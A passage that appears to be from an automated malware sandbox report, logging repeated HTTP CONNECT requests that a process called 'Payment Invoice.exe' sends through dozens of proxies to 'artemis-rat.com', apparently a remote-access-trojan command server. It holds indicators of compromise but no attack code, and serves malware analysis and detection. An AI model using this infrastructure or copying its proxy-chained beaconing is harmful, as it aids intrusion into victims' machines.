                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                772192.168.2.451563162.243.55.12591797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.532782078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.620647907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.621017933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.621525049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.620726109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:53.623976946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:05.624259949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:29.620517015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:17.714318037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                773192.168.2.45245167.43.227.226151437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.537781954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                774192.168.2.452335221.153.92.39807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.549156904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                775192.168.2.452338211.222.252.187807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.550023079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.850723028 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                776192.168.2.452510172.67.181.20807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.550328970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.707279921 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                777192.168.2.451495212.127.93.18580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.562660933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                778192.168.2.45237443.129.228.4678907076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.568597078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.872733116 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                779192.168.2.452349181.212.136.3475187076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.571738958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.323527098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.323865891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.324081898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                780192.168.2.452437147.75.92.24494017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.577301979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.214457989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214529991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                781192.168.2.452324103.49.202.252807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.584916115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                782192.168.2.45240961.92.189.15807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.590720892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                783192.168.2.451576162.241.50.179537557076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.594758987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                784192.168.2.452372193.239.58.928081
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.594933033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                785192.168.2.452364185.38.111.180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.627347946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.953345060 CET75INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:17 GMT
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:18.345206022 CET103INHTTP/1.1 400 Bad Request
                                                                Content-Type: text/plain; charset=utf-8
                                                                Connection: close
                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                Data Ascii: 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                786192.168.2.452452147.75.34.85100077076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.648302078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.951567888 CET65INHTTP/1.1 200 Connection Established
                                                                Proxy-Agent: Zscaler/6.3


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                787192.168.2.452399192.162.232.1510807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.649394035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                788192.168.2.452379116.62.147.24931287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.650084972 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511094093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.527453899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.887489080 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                789192.168.2.45238945.11.95.16560107076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.651308060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                790192.168.2.45009898.64.169.1780807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.653628111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.985182047 CET39INHTTP/1.1 200 Connection established
                                                                Mar 11, 2024 16:15:42.797854900 CET39INHTTP/1.1 200 Connection established
                                                                Mar 11, 2024 16:15:43.729598999 CET39INHTTP/1.1 200 Connection established
                                                                Mar 11, 2024 16:15:45.549417973 CET39INHTTP/1.1 200 Connection established
                                                                Mar 11, 2024 16:15:49.199275970 CET39INHTTP/1.1 200 Connection established
                                                                Mar 11, 2024 16:15:56.626705885 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                791192.168.2.452468167.71.5.8380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.654648066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.832943916 CET28INHTTP/1.1 400 Bad Request


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                792192.168.2.45246047.242.234.237807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.658880949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                793192.168.2.45247745.65.65.1841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.674882889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                794192.168.2.452482196.20.125.14580837076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.675034046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                795192.168.2.452307123.126.158.50807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.675070047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                796192.168.2.452446185.49.30.580817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.675215006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                797192.168.2.450228132.148.128.88297457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.690978050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.823832989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.824636936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.824179888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                798192.168.2.452395212.174.242.11480807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:17.691394091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.511249065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.714540005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.027352095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.527041912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.027084112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.511382103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
